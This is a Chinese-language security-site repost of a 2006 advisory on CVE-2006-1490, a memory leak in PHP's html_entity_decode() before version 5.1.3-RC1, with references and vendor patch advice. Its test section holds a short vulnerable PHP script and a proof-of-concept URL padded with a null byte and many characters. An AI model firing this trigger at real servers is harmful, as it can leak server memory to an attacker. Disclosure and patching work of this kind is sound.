PHP html_entity_decode()函数信息泄露漏洞

首页	安全动态	IT新闻	安全人物	本站动态	漏洞公告	病毒警报	木马预警
流氓软件	漏洞分析	入侵检测	升级补丁	安全配置	信道安全	设备安全	协议安全
WEB安全	病毒分析	木马研究	脚本注入	后门探讨	技术应用	数据安全	企业专区

收藏本站

设为首页

PHP html_entity_decode()函数信息泄露漏洞

作者：佚名文章来源：不详点击数：更新时间：2007-1-26 15:19:41

2006-11-29 21:09:25

发布日期：2006-03-29
更新日期：2006-11-29

受影响系统：

PHP PHP < 5.1.3-RC1

不受影响系统：

PHP PHP 5.1.3-RC1

描述：

BUGTRAQ  ID: 17296
CVE(CAN) ID: CVE-2006-1490

PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。

PHP的html_entity_decode函数中存在输入验证错误。如果使用该函数的脚本接收了远程不可信任来源的输入的话，就会返回函数的结果，导致内存泄露。

<*来源：Stefan Esser （s.esser@ematters.de）
        Tõnu_Samuel （tonu@jes.ee）

  链接：http://marc.theaimsgroup.com/?l=full-disclosure&m=114357738604334&w=2
        http://docs.info.apple.com/article.html?artnum=304829
        http://secunia.com/advisories/23155/
        http://security.gentoo.org/glsa/glsa-200605-08.xml
        http://lwn.net/Alerts/181294/?format=printable
        http://www.us-cert.gov/cas/techalerts/TA06-333A.html
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php

   $foobar=html_entity_decode($_GET['foo']);
   echo $foobar;

?>

Running it with url:

http://hostname/index.php?foo=%00sssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
sssssssss

建议：

厂商补丁：

PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载5.1.3-RC1：

http://www.php.net

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2006:0276-01）以及相应补丁:
RHSA-2006:0276-01：Moderate: php security update
链接：http://lwn.net/Alerts/181294/?format=printable

Gentoo
------
Gentoo已经为此发布了一个安全公告（GLSA-200605-08）以及相应补丁:
GLSA-200605-08：PHP: Multiple vulnerabilities
链接：http://security.gentoo.org/glsa/glsa-200605-08.xml

所有PHP用户都应升级到最新版本：

    # emerge --sync
    # emerge --ask --oneshot --verbose dev-lang/php

文章录入：admin 责任编辑：admin

上一篇文章： PHP HTMLEntities和HTMLSpecialChars函数缓冲区溢出漏洞

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

PHP HTMLEntities和HTML
PHP wordwrap()缓冲区溢
phpMyAdmin多个HTTP响应
PHP session.save_path(
WordPress functions.ph
PHP Easy Download file
PHP HTMLEntities和HTML
WordPress functions.ph
PHP Easy Download file
phpBB PlusXL phpbb_roo

\| 设为首页 \| 加入收藏 \| 联系站长 \| 友情链接 \| 版权申明 \|
Copyright © 2006-2008　www.anquan365.com　安全365 建议使用1024*768分辨率及第三方浏览器对本站进行浏览